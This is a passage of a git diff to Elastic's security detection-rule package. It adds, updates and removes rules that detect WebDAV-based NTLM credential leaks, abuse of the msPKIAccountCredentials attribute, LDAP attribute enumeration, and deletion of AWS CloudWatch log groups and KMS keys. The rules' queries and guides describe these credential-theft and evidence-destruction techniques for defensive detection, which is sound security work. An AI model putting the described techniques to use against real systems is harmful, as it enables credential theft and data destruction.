"https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" @@ -21,6 +22,10 @@ { "package": "endpoint", "version": "^9.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" } ], "required_fields": [ @@ -34,11 +39,6 @@ "name": "host.os.type", "type": "keyword" }, - { - "ecs": true, - "name": "network.protocol", - "type": "keyword" - }, { "ecs": true, "name": "process.code_signature.subject_name", @@ -59,6 +59,11 @@ "name": "process.name", "type": "keyword" }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, { "ecs": true, "name": "user.id", @@ -74,7 +79,8 @@ "Use Case: Threat Detection", "Tactic: Command and Control", "Resources: Investigation Guide", - "Data Source: Elastic Defend" + "Data Source: Elastic Defend", + "Data Source: SentinelOne" ], "threat": [ { @@ -101,6 +107,18 @@ "reference": "https://attack.mitre.org/techniques/T1568/002/" } ] + }, + { + "id": "T1090", + "name": "Proxy", + "reference": "https://attack.mitre.org/techniques/T1090/", + "subtechnique": [ + { + "id": "T1090.002", + "name": "External Proxy", + "reference": "https://attack.mitre.org/techniques/T1090/002/" + } + ] } ] }, @@ -134,8 +152,8 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 120 + "version": 124 }, - "id": "66883649-f908-4a5b-a1e0-54090a1d3a32_120", + "id": "66883649-f908-4a5b-a1e0-54090a1d3a32_124", "type": "security-rule" } \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_115.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_115.json deleted file mode 100644 index 8f3dad5ce20..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_115.json +++ /dev/null @@ -1,92 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identify the modification of the msPKIAccountCredentials attribute in an Active Directory User Object. Attackers can abuse the credentials roaming feature to overwrite an arbitrary file for privilege escalation. ms-PKI-AccountCredentials contains binary large objects (BLOBs) of encrypted credential objects from the credential manager store, private keys, certificates, and certificate requests.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-system.security*", - "logs-windows.forwarded*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Modification of the msPKIAccountCredentials", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Modification of the msPKIAccountCredentials\n\nThe msPKIAccountCredentials attribute in Active Directory stores encrypted credential data, including private keys and certificates. Adversaries may exploit this by altering the attribute to escalate privileges, potentially overwriting files. The detection rule identifies such modifications by monitoring specific directory service events, focusing on changes to this attribute, excluding actions by the system account, thus highlighting unauthorized access attempts.\n\n### Possible investigation steps\n\n- Review the event logs for the specific event code 5136 to gather details about the modification event, including the timestamp and the user account involved.\n- Examine the winlog.event_data.SubjectUserSid field to identify the user who attempted the modification, ensuring it is not the system account (S-1-5-18).\n- Investigate the history and behavior of the identified user account to determine if there are any previous suspicious activities or anomalies.\n- Check for any recent changes or anomalies in the affected Active Directory User Object, focusing on the msPKIAccountCredentials attribute.\n- Assess the potential impact of the modification by identifying any files or systems that may have been affected by the altered credentials.\n- Correlate this event with other security alerts or logs to identify any patterns or coordinated activities that might indicate a broader attack.\n\n### False positive analysis\n\n- Routine administrative tasks by IT personnel may trigger the rule. To manage this, create exceptions for specific user accounts or groups known to perform these tasks regularly.\n- Scheduled maintenance scripts or automated processes that modify Active Directory attributes could be mistaken for unauthorized changes. Identify these processes and exclude their associated user accounts or service accounts from the rule.\n- Software updates or installations that require changes to user credentials might cause false positives. Document these events and adjust the rule to ignore modifications during known update windows.\n- Legitimate changes made by third-party applications integrated with Active Directory can be flagged. Review and whitelist these applications by excluding their associated user accounts or service accounts.\n- Temporary changes during incident response or security audits may appear suspicious. Coordinate with security teams to ensure these activities are recognized and excluded from triggering alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration.\n- Revoke any potentially compromised certificates and private keys associated with the affected msPKIAccountCredentials attribute to prevent misuse.\n- Conduct a thorough review of recent changes in Active Directory, focusing on the msPKIAccountCredentials attribute, to identify any unauthorized modifications or access patterns.\n- Reset passwords and regenerate keys for any accounts or services that may have been affected to ensure that compromised credentials are no longer valid.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the full scope of the breach.\n- Implement additional monitoring on the affected systems and accounts to detect any further suspicious activity or attempts to exploit similar vulnerabilities.\n- Review and update access controls and permissions in Active Directory to ensure that only authorized personnel have the ability to modify sensitive attributes like msPKIAccountCredentials.", - "query": "event.code:\"5136\" and winlog.event_data.AttributeLDAPDisplayName:\"msPKIAccountCredentials\" and\n winlog.event_data.OperationType:\"%%14674\" and\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\"\n", - "references": [ - "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", - "https://social.technet.microsoft.com/wiki/contents/articles/11483.windows-credential-roaming.aspx", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.AttributeLDAPDisplayName", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.OperationType", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.SubjectUserSid", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313", - "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Data Source: Active Directory", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1068", - "name": "Exploitation for Privilege Escalation", - "reference": "https://attack.mitre.org/techniques/T1068/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 115 - }, - "id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313_115", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_210.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_210.json index f0ff93abacc..d001cb166fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_210.json +++ b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_210.json @@ -23,7 +23,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/6756ee27-9152-479b-9b73-54b5bbda301c_4.json b/packages/security_detection_engine/kibana/security_rule/6756ee27-9152-479b-9b73-54b5bbda301c_4.json new file mode 100644 index 00000000000..5ec85381503 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6756ee27-9152-479b-9b73-54b5bbda301c_4.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies rare connection attempts to a Web Distributed Authoring and Versioning (WebDAV) resource. Attackers may inject WebDAV paths in files or features opened by a victim user to leak their NTLM credentials via forced authentication.", + "from": "now-3660s", + "language": "esql", + "license": "Elastic License v2", + "name": "Rare Connection to WebDAV Target", + "note": "## Triage and analysis\n\n### Investigating Rare Connection to WebDAV Target\n\n### Possible investigation steps\n\n- Examine the reputation of the destination domain or IP address.\n- Verify if the target user opened any attachments or clicked links pointing to the same target within seconds from the alert timestamp.\n- Correlate the findings with other security logs and alerts to identify any patterns or additional indicators of compromise related to the potential relay attack.\n\n### False positive analysis\n\n- User accessing legit WebDAV resources.\n\n### Response and remediation\n\n- Conduct a password reset for the target account that may have been compromised or are at risk, ensuring the use of strong, unique passwords.\n- Verify whether other users were targeted but did not open the lure..\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the full scope of the breach.\n- Conduct a post-incident review to identify any gaps in security controls and update policies or procedures to prevent recurrence, ensuring lessons learned are applied to improve overall security posture.", + "query": "from logs-endpoint.events.process-*, logs-windows.sysmon_operational-*, logs-system.security-*, logs-windows.*, winlogbeat-*, logs-crowdstrike.fdr*, logs-m365_defender.event-* METADATA _id, _version, _index\n| where\n @timestamp > now() - 8 hours and\n event.category == \"process\" and\n event.type == \"start\" and\n process.name == \"rundll32.exe\" and\n process.command_line like \"*DavSetCookie*\"\n| keep host.id, process.command_line, user.name\n| grok process.command_line \"\"\"(?DavSetCookie .* http)\"\"\"\n| eval\n Esql.server_webdav_cookie_replace = replace(Esql.server_webdav_cookie, \"(DavSetCookie | http)\", \"\")\n| where\n Esql.server_webdav_cookie_replace is not null and\n Esql.server_webdav_cookie_replace rlike \"\"\"(([a-zA-Z0-9-]+\\.)+[a-zA-Z]{2,3}(@SSL.*)*|(\\d{1,3}\\.){3}\\d{1,3})\"\"\" and\n not Esql.server_webdav_cookie_replace in (\"www.google.com@SSL\", \"www.elastic.co@SSL\") and\n not Esql.server_webdav_cookie_replace rlike \"\"\"(10\\.(\\d{1,3}\\.){2}\\d{1,3}|172\\.(1[6-9]|2\\d|3[0-1])\\.(\\d{1,3}\\.)\\d{1,3}|192\\.168\\.(\\d{1,3}\\.)\\d{1,3})\"\"\"\n| stats\n Esql.event_count = count(*),\n Esql.host_id_count_distinct = count_distinct(host.id),\n Esql.host_id_values = values(host.id),\n Esql.user_name_values = values(user.name)\n by Esql.server_webdav_cookie_replace\n| where\n Esql.host_id_count_distinct == 1 and\n Esql.event_count <= 3\n", + "references": [ + "https://attack.mitre.org/techniques/T1187/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.host_id_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.host_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.server_webdav_cookie_replace", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.user_name_values", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6756ee27-9152-479b-9b73-54b5bbda301c", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1187", + "name": "Forced Authentication", + "reference": "https://attack.mitre.org/techniques/T1187/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 4 + }, + "id": "6756ee27-9152-479b-9b73-54b5bbda301c_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_211.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_211.json index 05bae2f18cc..5b50cd0d87f 100644 --- a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_211.json +++ b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_211.json @@ -24,7 +24,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_209.json b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_209.json index 1175c41a49a..f97fe11f6c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_209.json +++ b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_209.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_209.json b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_209.json deleted file mode 100644 index 641065e29d3..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_209.json +++ /dev/null @@ -1,112 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of a specified AWS CloudWatch log group. When a log group is deleted, all the archived log events associated with the log group are also permanently deleted.", - "false_positives": [ - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Log group deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS CloudWatch Log Group Deletion", - "note": "## Triage and analysis\n\n### Investigating AWS CloudWatch Log Group Deletion\n\nAmazon CloudWatch is a monitoring and observability service that collects monitoring and operational data in the form of logs, metrics, and events for resources and applications. This data can be used to detect anomalous behavior in your environments, set alarms, visualize logs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your applications running smoothly.\n\nA log group is a group of log streams that share the same retention, monitoring, and access control settings. You can define log groups and specify which streams to put into each group. There is no limit on the number of log streams that can belong to one log group.\n\nThis rule looks for the deletion of a log group using the API `DeleteLogGroup` action. Attackers can do this to cover their tracks and impact security monitoring that relies on these sources.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log group's criticality and whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:aws.cloudtrail and event.provider:logs.amazonaws.com and event.action:DeleteLogGroup and event.outcome:success\n", - "references": [ - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/delete-log-group.html", - "https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DeleteLogGroup.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "68a7a5a5-a2fc-4a76-ba9f-26849de881b4", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS CloudWatch", - "Use Case: Log Auditing", - "Resources: Investigation Guide", - "Tactic: Impact" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1485", - "name": "Data Destruction", - "reference": "https://attack.mitre.org/techniques/T1485/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 209 - }, - "id": "68a7a5a5-a2fc-4a76-ba9f-26849de881b4_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/68ad737b-f90a-4fe5-bda6-a68fa460044e_105.json b/packages/security_detection_engine/kibana/security_rule/68ad737b-f90a-4fe5-bda6-a68fa460044e_105.json deleted file mode 100644 index 09c4d9d8340..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/68ad737b-f90a-4fe5-bda6-a68fa460044e_105.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identify read access to a high number of Active Directory object attributes. The knowledge of objects properties can help adversaries find vulnerabilities, elevate privileges or collect sensitive information.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Suspicious Access to LDAP Attributes", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious Access to LDAP Attributes\n\nLDAP (Lightweight Directory Access Protocol) is crucial for querying and modifying directory services like Active Directory, which stores user credentials and permissions. Adversaries exploit LDAP to enumerate directory attributes, seeking vulnerabilities or sensitive data. The detection rule identifies unusual read access patterns, such as excessive attribute queries, which may indicate reconnaissance or privilege escalation attempts.\n\n### Possible investigation steps\n\n- Review the event logs for the specific event code 4662 to gather details about the suspicious read access, focusing on the winlog.event_data.Properties field to understand which attributes were accessed.\n- Identify the user associated with the suspicious activity by examining the winlog.event_data.SubjectUserSid field, and determine if this user has a legitimate reason to access a high number of Active Directory object attributes.\n- Check the user's recent activity and login history to identify any unusual patterns or anomalies that could indicate compromised credentials or unauthorized access.\n- Investigate the source machine from which the LDAP queries originated to determine if it is a known and trusted device or if it shows signs of compromise or unauthorized use.\n- Correlate this event with other security alerts or logs to identify if this activity is part of a larger pattern of reconnaissance or privilege escalation attempts within the network.\n\n### False positive analysis\n\n- Regular system maintenance or updates may trigger high attribute read access. Exclude known maintenance accounts from the rule to prevent false alerts.\n- Automated scripts or applications that query Active Directory for legitimate purposes can cause excessive attribute reads. Identify and whitelist these scripts or applications to reduce noise.\n- Security audits or compliance checks often involve extensive directory queries. Coordinate with IT and security teams to recognize these activities and adjust the rule to exclude them.\n- Service accounts with legitimate high-volume access patterns should be reviewed and, if deemed non-threatening, added to an exception list to avoid unnecessary alerts.\n- Consider the context of the access, such as time of day or associated user activity, to differentiate between normal and suspicious behavior. Adjust the rule to account for these patterns where applicable.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration.\n- Conduct a thorough review of the user account associated with the suspicious LDAP access to determine if it has been compromised. Reset the account credentials and enforce multi-factor authentication.\n- Analyze the event logs to identify any other systems or accounts that may have been accessed using similar methods, and apply the same containment measures.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the full scope of the breach.\n- Implement additional monitoring on LDAP queries and Active Directory access to detect similar patterns of excessive attribute queries in the future.\n- Review and tighten access controls and permissions within Active Directory to ensure that only necessary attributes are accessible to users based on their roles.\n- Conduct a post-incident review to identify any gaps in security controls and update policies or procedures to prevent recurrence of similar threats.", - "query": "any where event.code == \"4662\" and not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n winlog.event_data.AccessMaskDescription == \"Read Property\" and length(winlog.event_data.Properties) >= 2000\n", - "related_integrations": [ - { - "package": "windows", - "version": "^2.5.0" - }, - { - "package": "system", - "version": "^1.64.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.AccessMaskDescription", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.Properties", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.SubjectUserSid", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "68ad737b-f90a-4fe5-bda6-a68fa460044e", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Windows Security Event Logs", - "Data Source: Active Directory", - "Data Source: Windows", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1069", - "name": "Permission Groups Discovery", - "reference": "https://attack.mitre.org/techniques/T1069/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 105 - }, - "id": "68ad737b-f90a-4fe5-bda6-a68fa460044e_105", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_110.json b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_110.json new file mode 100644 index 00000000000..f80f216160e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_110.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Xavier Pich" + ], + "description": "Identifies attempts to disable or schedule the deletion of an AWS customer managed KMS Key. Disabling or scheduling a KMS key for deletion removes the ability to decrypt data encrypted under that key and can permanently destroy access to critical resources. Adversaries may use these operations to cause irreversible data loss, disrupt business operations, impede incident response, or hide evidence of prior activity. Because KMS keys often protect sensitive or regulated data, any modification to their lifecycle should be considered highly sensitive and investigated promptly.", + "false_positives": [ + "A customer managed KMS key may be disabled or scheduled for deletion by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Key deletions by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "aws.cloudtrail.resources.arn", + "aws.cloudtrail.resources.type", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS KMS Customer Managed Key Disabled or Scheduled for Deletion", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. \n> While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS KMS Customer Managed Key Disabled or Scheduled for Deletion\n\nAWS KMS keys underpin encryption for S3, EBS, RDS, Secrets Manager, Lambda, and numerous other AWS services. Disabling a KMS key or scheduling its deletion immediately disrupts encryption and decryption workflows, and, once deleted, renders all data encrypted with that key unrecoverable.\n\nBecause these operations are rare, highly privileged, and tightly controlled in mature environments, they should be treated as high-risk, destructive actions when performed unexpectedly. Adversaries may disable or delete KMS keys to sabotage recovery, impede forensic analysis, or destroy evidence after exfiltration.\n\n\n#### Possible investigation steps\n\n- **Identify the actor and authentication context**\n - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine the caller.\n - Check `source.ip`, `source.geo` fields, and `user_agent.original` to determine whether the action originated from an expected network path or automation platform.\n - Compare the actor and access key to historical usage patterns.\n\n- **Determine what key was affected and its criticality**\n - Inspect `aws.cloudtrail.resources.arn` to identify the KMS key.\n - Determine:\n - The services and data protected by the key (e.g., RDS, EBS, S3, Secrets Manager).\n - The environment (prod vs. dev).\n - Owner or application team.\n\n- **Understand the scope and intent of the change**\n - For `DisableKey`, determine whether a dependent service immediately began failing or experienced decryption errors.\n - For `ScheduleKeyDeletion`, examine the `PendingWindowInDays` value within `aws.cloudtrail.request_parameters`.\n - Check whether the key was previously rotated, enabled/disabled, or had its policy recently modified.\n\n- **Correlate with surrounding events**\n - Look for:\n - IAM policy changes granting new KMS privileges.\n - Access anomalies involving the same principal.\n - File system, database, or backup deletions near the same timeframe.\n - S3, EBS, or RDS resources showing encryption failures.\n - Determine whether other keys were modified in the same window (possible broader sabotage attempt).\n\n- **Validate intent with owners**\n - Confirm with the application, data, or security owners:\n - Whether deactivation or scheduled deletion was requested.\n - Whether the key was being replaced, migrated, or retired.\n\n### False positive analysis\n\n- **Planned key lifecycle activities**\n - Some organizations disable KMS keys before rotation, migration, or decommissioning.\n - Scheduled deletion during infrastructure teardown may be expected in CI/CD-driven ephemeral environments.\n\n- **Configuration errors**\n - Misapplied tags or incorrect CloudFormation teardown workflows can unintentionally disable or schedule deletion of KMS keys.\n\nIf any of the above conditions apply, consider adjusting rule exceptions based on IAM principal, environment tag, or automation role.\n\n### Response and remediation\n\n- **Contain and validate**\n - Immediately confirm whether the key disablement or deletion schedule was intentional.\n - If unauthorized, cancel scheduled deletion (`CancelKeyDeletion`) and re-enable the key (`EnableKey`) as appropriate.\n - Rotate credentials or access keys used by the actor if compromise is suspected.\n\n- **Assess impact**\n - Identify all AWS services and data encrypted with the affected KMS key.\n - Review logs and service metrics for failures involving:\n - EBS volume attachments\n - RDS instance decryption\n - S3 object access\n - Secrets Manager retrieval\n - Lambda environment variable decryption\n\n- **Investigate for compromise**\n - Review CloudTrail activity for the principal:\n - Permission escalations\n - Unusual STS role assumptions\n - S3, EC2, RDS destructive behavior\n - Look for preceding data access or exfiltration attempts.\n\n- **Strengthen controls**\n - Restrict AWS KMS lifecycle permissions (`kms:DisableKey`, `kms:ScheduleKeyDeletion`) to a very small privileged set.\n - Use AWS Organizations SCPs to prevent KMS key deletion in production accounts.\n - Enable AWS Config rules for KMS key state monitoring.\n - Require MFA for administrators capable of key management.\n\n- **Post-incident improvement**\n - Update runbooks to include KMS lifecycle change approvals.\n - Implement tagging standards to designate high-risk keys.\n - Enhance monitoring for key policy modifications or changes to principal permissions.\n\n### Additional information\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "event.dataset: \"aws.cloudtrail\"\n and event.provider: \"kms.amazonaws.com\" 